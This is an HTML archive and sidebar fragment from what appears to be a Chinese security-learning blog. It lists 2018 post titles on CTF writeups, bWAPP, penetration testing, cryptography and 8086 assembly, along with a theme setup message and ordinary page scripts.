    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/16</span><a class="archive-post-title" href= "/2018/10/16/8086通用指令之通用寄存器/" >8086通用指令</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/14</span><a class="archive-post-title" href= "/2018/10/14/护网杯WP/" >护网杯WP</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/10</span><a class="archive-post-title" href= "/2018/10/10/流密码/" >流密码</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/08</span><a class="archive-post-title" href= "/2018/10/08/bwapp(1)/" >bwapp(1)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/渗透测试初步学习之信息收集/" >渗透测试初步学习之信息收集</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/渗透测试初步学习之漏洞发现/" >渗透测试初步学习之漏洞发现和源码泄露</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/web开发快速入门(一)/" >WEB开发快速入门（一）</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/I春秋CTF训练营web题解（一）/" >I春秋CTF训练营web题解（一）</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="bwapp"><span class="iconfont-archer">&#xe606;</span>bwapp</span>
    
        <span class="sidebar-tag-name" data-tags="二进制"><span class="iconfont-archer">&#xe606;</span>二进制</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="渗透测试"><span class="iconfont-archer">&#xe606;</span>渗透测试</span>
    
        <span class="sidebar-tag-name" data-tags="WEB"><span class="iconfont-archer">&#xe606;</span>WEB</span>
    
        <span class="sidebar-tag-name" data-tags="密码学"><span class="iconfont-archer">&#xe606;</span>密码学</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="玩转bwapp"><span class="iconfont-archer">&#xe60a;</span>玩转bwapp</span>
    
        <span class="sidebar-category-name" data-categories="二进制"><span class="iconfont-archer">&#xe60a;</span>二进制</span>
    
        <span class="sidebar-category-name" data-categories="CTF训练"><span class="iconfont-archer">&#xe60a;</span>CTF训练</span>
    
        <span class="sidebar-category-name" data-categories="Web开发"><span class="iconfont-archer">&#xe60a;</span>Web开发</span>
    
        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="密码学"><span class="iconfont-archer">&#xe60a;</span>密码学</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "John Doe"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


